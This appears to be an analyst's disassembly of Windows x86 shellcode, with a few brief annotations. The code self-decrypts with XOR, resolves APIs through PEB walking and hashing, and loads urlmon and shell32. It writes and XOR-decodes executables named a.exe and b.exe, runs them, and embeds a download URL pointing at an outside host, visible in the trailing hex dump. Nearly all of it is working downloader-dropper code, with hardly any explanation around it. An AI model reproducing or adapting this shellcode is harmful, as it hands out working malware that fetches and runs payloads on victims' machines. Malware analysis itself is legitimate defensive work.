self-decrypt: 00000000 90 nop 00000001 90 nop 00000002 EB19 jmp short 0x1d 00000004 5B pop ebx 00000005 4B dec ebx 00000006 90 nop 00000007 33C9 xor ecx,ecx 00000009 90 nop 0000000A 807B01E9 cmp byte [ebx+0x1],0xe9 0000000E 7501 jnz 0x11 00000010 C3 ret 00000011 66B97B04 mov cx,0x47b 00000015 80340BD8 xor byte [ebx+ecx],0xd8 00000019 E2FA loop 0x15 0000001B EB05 jmp short 0x22 0000001D E8E2FFFFFF call 0x4 entry: 00000022 E9E1030000 jmp 0x408 00000027 5F pop edi 00000028 64A130000000 mov eax,[fs:0x30] 0000002E 8B400C mov eax,[eax+0xc] 00000031 8B701C mov esi,[eax+0x1c] 00000034 AD lodsd 00000035 8B6808 mov ebp,[eax+0x8] 00000038 8BF7 mov esi,edi 0000003A 6A0F push byte +0xf 0000003C 59 pop ecx 0000003D E881030000 call 0x3c3 00000042 90 nop 00000043 E2F8 loop 0x3d 00000045 6833320000 push dword 0x3233 0000004A 6855736572 push dword 0x72657355 0000004F 54 push esp 00000050 8B460C mov eax,[esi+0xc] 00000053 E8EF020000 call 0x347 00000058 8BE8 mov ebp,eax 0000005A 6A01 push byte +0x1 0000005C 59 pop ecx 0000005D E861030000 call 0x3c3 00000062 E2F9 loop 0x5d 00000064 686F6E0000 push dword 0x6e6f 00000069 6875726C6D push dword 0x6d6c7275 0000006E 54 push esp 0000006F 8B460C mov eax,[esi+0xc] 00000072 E8D0020000 call 0x347 00000077 8BE8 mov ebp,eax 00000079 6A01 push byte +0x1 0000007B 59 pop ecx 0000007C E842030000 call 0x3c3 00000081 E2F9 loop 0x7c 00000083 686C333200 push dword 0x32336c 00000088 687368656C push dword 0x6c656873 0000008D 54 push esp 0000008E 8B460C mov eax,[esi+0xc] 00000091 E8B1020000 call 0x347 00000096 8BE8 mov ebp,eax 00000098 6A01 push byte +0x1 0000009A 59 pop ecx 0000009B E823030000 call 0x3c3 000000A0 E2F9 loop 0x9b 000000A2 81EC00010000 sub esp,0x100 000000A8 8BDC mov ebx,esp 000000AA 81C380000000 add ebx,0x80 000000B0 6A00 push byte +0x0 000000B2 6A1A push byte +0x1a 000000B4 53 push ebx 000000B5 6A00 push byte +0x0 000000B7 FF5644 call near [esi+0x44] 000000BA 33C0 xor eax,eax 000000BC 40 inc eax 000000BD 803C0300 cmp byte [ebx+eax],0x0 000000C1 75F9 jnz 0xbc 000000C3 898690000000 mov [esi+0x90],eax 000000C9 C704035C612E65 mov dword [ebx+eax],0x652e615c 000000D0 C744030478650000 mov dword [ebx+eax+0x4],0x6578 000000D8 33C9 xor ecx,ecx 000000DA 51 push ecx 000000DB 51 push ecx 000000DC 53 push ebx 000000DD 57 push edi 000000DE 51 push ecx 000000DF 33C0 xor eax,eax 000000E1 8B4640 mov eax,[esi+0x40] 000000E4 E85E020000 call 0x347 000000E9 83F800 cmp eax,byte +0x0 000000EC 0F857F010000 jnz near 0x271 000000F2 6A00 push byte +0x0 000000F4 6A00 push byte +0x0 000000F6 6A03 push byte +0x3 000000F8 6A00 push byte +0x0 000000FA 6A02 push byte +0x2 000000FC 68000000C0 push dword 0xc0000000 00000101 53 push ebx 00000102 8B4624 mov eax,[esi+0x24] 00000105 E83D020000 call 0x347 0000010A 83F8FF cmp eax,byte -0x1 0000010D 0F845E010000 jz near 0x271 00000113 894660 mov [esi+0x60],eax 00000116 6A00 push byte +0x0 00000118 50 push eax 00000119 FF5628 call near [esi+0x28] 0000011C 894664 mov [esi+0x64],eax 0000011F 8B8690000000 mov eax,[esi+0x90] 00000125 C704035C622E65 mov dword [ebx+eax],0x652e625c 0000012C C744030478650000 mov dword [ebx+eax+0x4],0x6578 00000134 6A00 push byte +0x0 00000136 6A00 push byte +0x0 00000138 6A02 push byte +0x2 0000013A 6A00 push byte +0x0 0000013C 6A00 push byte +0x0 0000013E 6800000040 push dword 0x40000000 00000143 53 push ebx 00000144 8B4624 mov eax,[esi+0x24] 00000147 E8FB010000 call 0x347 0000014C 83F8FF cmp eax,byte -0x1 0000014F 0F841C010000 jz near 0x271 00000155 898684000000 mov [esi+0x84],eax 0000015B 899E8C000000 mov [esi+0x8c],ebx 00000161 8B4660 mov eax,[esi+0x60] 00000164 6A00 push byte +0x0 00000166 6A00 push byte +0x0 00000168 6A00 push byte +0x0 0000016A 8B4660 mov eax,[esi+0x60] 0000016D 50 push eax 0000016E FF5638 call near [esi+0x38] 00000171 C7467000000000 mov dword [esi+0x70],0x0 00000178 C7467400000000 mov dword [esi+0x74],0x0 0000017F 81C700020000 add edi,0x200 00000185 33DB xor ebx,ebx 00000187 8B5E64 mov ebx,[esi+0x64] 0000018A 6A00 push byte +0x0 0000018C 8D4670 lea eax,[esi+0x70] 0000018F 50 push eax 00000190 6800040000 push dword 0x400 00000195 57 push edi 00000196 FF7660 push dword [esi+0x60] 00000199 FF5604 call near [esi+0x4] 0000019C 33C9 xor ecx,ecx 0000019E B900040000 mov ecx,0x400 000001A3 807C0FFF95 cmp byte [edi+ecx-0x1],0x95 000001A8 740C jz 0x1b6 000001AA 807C0FFF00 cmp byte [edi+ecx-0x1],0x0 000001AF 7405 jz 0x1b6 000001B1 80740FFF95 xor byte [edi+ecx-0x1],0x95 000001B6 E2EB loop 0x1a3 000001B8 8BC3 mov eax,ebx 000001BA 2D00040000 sub eax,0x400 000001BF 83F800 cmp eax,byte +0x0 000001C2 7F03 jg 0x1c7 000001C4 895E70 mov [esi+0x70],ebx 000001C7 6A00 push byte +0x0 000001C9 8D4674 lea eax,[esi+0x74] 000001CC 50 push eax 000001CD FF7670 push dword [esi+0x70] 000001D0 57 push edi 000001D1 FFB684000000 push dword [esi+0x84] 000001D7 FF5630 call near [esi+0x30] 000001DA 81EB00040000 sub ebx,0x400 000001E0 83FB00 cmp ebx,byte +0x0 000001E3 7FA5 jg 0x18a 000001E5 FF7660 push dword [esi+0x60] 000001E8 FF5634 call near [esi+0x34] 000001EB FFB684000000 push dword [esi+0x84] 000001F1 FF5634 call near [esi+0x34] 000001F4 8B8690000000 mov eax,[esi+0x90] 000001FA 8B9E8C000000 mov ebx,[esi+0x8c] 00000200 C704035C612E65 mov dword [ebx+eax],0x652e615c 00000207 53 push ebx 00000208 FF562C call near [esi+0x2c] 0000020B 8BBE8C000000 mov edi,[esi+0x8c] 00000211 8B8690000000 mov eax,[esi+0x90] 00000217 C704075C622E65 mov dword [edi+eax],0x652e625c 0000021E 81EC00010000 sub esp,0x100 00000224 8BDC mov ebx,esp 00000226 6800010000 push dword 0x100 0000022B 53 push ebx 0000022C 6800010000 push dword 0x100 00000231 57 push edi 00000232 6A00 push byte +0x0 00000234 6A00 push byte +0x0 00000236 FF561C call near [esi+0x1c] 00000239 8BFB mov edi,ebx 0000023B 33C0 xor eax,eax 0000023D 33DB xor ebx,ebx 0000023F 81EC00020000 sub esp,0x200 00000245 8BCC mov ecx,esp 00000247 83F854 cmp eax,byte +0x54 0000024A 7D08 jnl 0x254 0000024C 891C01 mov [ecx+eax],ebx 0000024F 83C004 add eax,byte +0x4 00000252 EBF3 jmp short 0x247 00000254 8BCC mov ecx,esp 00000256 8BD9 mov ebx,ecx 00000258 83C310 add ebx,byte +0x10 0000025B 33C0 xor eax,eax 0000025D 50 push eax 0000025E 51 push ecx 0000025F 53 push ebx 00000260 50 push eax 00000261 50 push eax 00000262 50 push eax 00000263 50 push eax 00000264 50 push eax 00000265 50 push eax 00000266 57 push edi 00000267 50 push eax 00000268 50 push eax 00000269 8B4608 mov eax,[esi+0x8] 0000026C E8F7000000 call 0x368 00000271 8B7E3C mov edi,[esi+0x3c] 00000274 E834010000 call 0x3ad 00000279 E837000000 call 0x2b5 0000027E 6863767700 push dword 0x777663 00000283 687368646F push dword 0x6f646873 00000288 54 push esp 00000289 8B460C mov eax,[esi+0xc] 0000028C E8B6000000 call 0x347 00000291 89463C mov [esi+0x3c],eax 00000294 64A104000000 mov eax,[fs:0x4] 0000029A 8DA060FFFFFF lea esp,[eax+0xffffff60] 000002A0 6A65 push byte +0x65 000002A2 FF763C push dword [esi+0x3c] 000002A5 8B4610 mov eax,[esi+0x10] 000002A8 E89A000000 call 0x347 000002AD 33DB xor ebx,ebx 000002AF 53 push ebx 000002B0 53 push ebx 000002B1 53 push ebx 000002B2 53 push ebx 000002B3 FFD0 call eax 000002B5 E8E5000000 call 0x39f 000002BA 81EC00010000 sub esp,0x100 000002C0 8BFC mov edi,esp 000002C2 83C704 add edi,byte +0x4 000002C5 C7073274910C mov dword [edi],0xc917432 000002CB C747046389D14F mov dword [edi+0x4],0x4fd18963 000002D2 C74708A06597CB mov dword [edi+0x8],0xcb9765a0 000002D9 C7470C5140BA7F mov dword [edi+0xc],0x7fba4051 000002E0 C747103E1DB639 mov dword [edi+0x10],0x39b61d3e 000002E7 C74714B869D41B mov dword [edi+0x14],0x1bd469b8 000002EE C74718BE7F66A0 mov dword [edi+0x18],0xa0667fbe 000002F5 C7471CFCA937AD mov dword [edi+0x1c],0xad37a9fc 000002FC C74720980A10F8 mov dword [edi+0x20],0xf8100a98 00000303 64A130000000 mov eax,[fs:0x30] 00000309 8B400C mov eax,[eax+0xc] 0000030C 8B701C mov esi,[eax+0x1c] 0000030F AD lodsd 00000310 8B6808 mov ebp,[eax+0x8] 00000313 8BF7 mov esi,edi 00000315 895664 mov [esi+0x64],edx 00000318 6A04 push byte +0x4 0000031A 59 pop ecx 0000031B E8A3000000 call 0x3c3 00000320 90 nop 00000321 E2F8 loop 0x31b 00000323 6833320000 push dword 0x3233 00000328 6855736572 push dword 0x72657355 0000032D 54 push esp 0000032E 8B06 mov eax,[esi] 00000330 E812000000 call 0x347 00000335 8BE8 mov ebp,eax 00000337 6A05 push byte +0x5 00000339 59 pop ecx 0000033A E884000000 call 0x3c3 0000033F E2F9 loop 0x33a 00000341 33FF xor edi,edi 00000343 57 push edi 00000344 FF5604 call near [esi+0x4] 00000347 8038E8 cmp byte [eax],0xe8 0000034A 8038E9 cmp byte [eax],0xe9 0000034D 7511 jnz 0x360 0000034F 81780590909090 cmp dword [eax+0x5],0x90909090 00000356 7408 jz 0x360 00000358 8BFF mov edi,edi 0000035A 55 push ebp 0000035B 8BEC mov ebp,esp 0000035D 8D4005 lea eax,[eax+0x5] 00000360 FFE0 jmp eax 00000362 E838000000 call 0x39f 00000367 C3 ret 00000368 8038E8 cmp byte [eax],0xe8 0000036B 8038E9 cmp byte [eax],0xe9 0000036E 7511 jnz 0x381 00000370 81780590909090 cmp dword [eax+0x5],0x90909090 00000377 74E7 jz 0x360 00000379 68080A0000 push dword 0xa08 0000037E 8D4005 lea eax,[eax+0x5] 00000381 FFE0 jmp eax 00000383 E817000000 call 0x39f 00000388 C3 ret 00000389 E811000000 call 0x39f 0000038E B811010480 mov eax,0x80040111 00000393 C20C00 ret 0xc 00000396 EB02 jmp short 0x39a 00000398 58 pop eax 00000399 C3 ret 0000039A E8F9FFFFFF call 0x398 0000039F 5B pop ebx 000003A0 C607B8 mov byte [edi],0xb8 000003A3 895F01 mov [edi+0x1],ebx 000003A6 66C74705FFE0 mov word [edi+0x5],0xe0ff 000003AC C3 ret 000003AD 53 push ebx 000003AE 8BDC mov ebx,esp 000003B0 53 push ebx 000003B1 6A40 push byte +0x40 000003B3 6800100000 push dword 0x1000 000003B8 57 push edi 000003B9 8B4620 mov eax,[esi+0x20] 000003BC E886FFFFFF call 0x347 000003C1 58 pop eax 000003C2 C3 ret 000003C3 51 push ecx 000003C4 56 push esi 000003C5 8B753C mov esi,[ebp+0x3c] 000003C8 8B742E78 mov esi,[esi+ebp+0x78] 000003CC 03F5 add esi,ebp 000003CE 56 push esi 000003CF 8B7620 mov esi,[esi+0x20] 000003D2 03F5 add esi,ebp 000003D4 33C9 xor ecx,ecx 000003D6 49 dec ecx 000003D7 41 inc ecx 000003D8 AD lodsd 000003D9 03C5 add eax,ebp 000003DB 33DB xor ebx,ebx 000003DD 0FBE10 movsx edx,byte [eax] 000003E0 3AD6 cmp dl,dh 000003E2 7408 jz 0x3ec 000003E4 C1CB07 ror ebx,0x7 000003E7 03DA add ebx,edx 000003E9 40 inc eax 000003EA EBF1 jmp short 0x3dd 000003EC 3B1F cmp ebx,[edi] 000003EE 75E7 jnz 0x3d7 000003F0 5E pop esi 000003F1 8B5E24 mov ebx,[esi+0x24] 000003F4 03DD add ebx,ebp 000003F6 668B0C4B mov cx,[ebx+ecx*2] 000003FA 8B5E1C mov ebx,[esi+0x1c] 000003FD 03DD add ebx,ebp 000003FF 8B048B mov eax,[ebx+ecx*4] 00000402 03C5 add eax,ebp 00000404 AB stosd 00000405 5E pop esi 00000406 59 pop ecx 00000407 C3 ret 00000408 E81AFCFFFF call 0x27 0000040D B2F2 mov dl,0xf2 0000040F E2F4 loop 0x405 00000411 B236 mov dl,0x36 00000413 0F13F0 umov esi,eax 00000416 48 dec eax 00000417 7B3D jpo 0x456 00000419 3274910C xor dh,[ecx+edx*4+0xc] 0000041D 85DF test edi,ebx 0000041F AF scasd 00000420 BB6389D14F mov ebx,0x4fd18963 00000425 51 push ecx 00000426 40 inc eax 00000427 BA7F079222 mov edx,0x2292077f 0000042C 701E jo 0x44c (this section is probably junk) 0000042E A4 movsb 0000042F 64EF fs out dx,eax 00000431 93 xchg eax,ebx 00000432 32E4 xor ah,ah 00000434 94 xchg eax,esp 00000435 8E13 mov ss,[ebx] 00000437 0AAC7939E698C4 or ch,[ecx+edi*2+0xc498e639] 0000043E 8D1F lea ebx,[edi] 00000440 7457 jz 0x499 00000442 660DFF43 or ax,0x43ff 00000446 BEACDB980A mov esi,0xa98dbac 0000044B 10F8 adc al,bh 0000044D 80D6AF adc dh,0xaf 00000450 9AFB5315666874 call 0x7468:0x661553fb (since there's a jump to 44c, an alternate decode here, which isn't much help) 0000044C F8 clc 0000044D 80D6AF adc dh,0xaf 00000450 9AFB5315666874 call 0x7468:0x661553fb 00000410 f4 b2 36 0f 13 f0 48 7b 3d 32 74 91 0c 85 df af |..6...H{=2t.....| 00000420 bb 63 89 d1 4f 51 40 ba 7f 07 92 22 70 1e a4 64 |.c..OQ@...."p..d| 00000430 ef 93 32 e4 94 8e 13 0a ac 79 39 e6 98 c4 8d 1f |..2......y9.....| 00000440 74 57 66 0d ff 43 be ac db 98 0a 10 f8 80 d6 af |tWf..C..........| 00000450 9a fb 53 15 66 68 74 74 70 3a 2f 2f 64 65 6d 6f |..S.fhttp://demo| 00000460 31 2e 66 74 70 61 63 63 65 73 73 2e 63 63 2f 64 |1.ftpaccess.cc/d| 00000470 65 6d 6f 2f 61 64 2e 6a 70 67 00 |emo/ad.jpg. |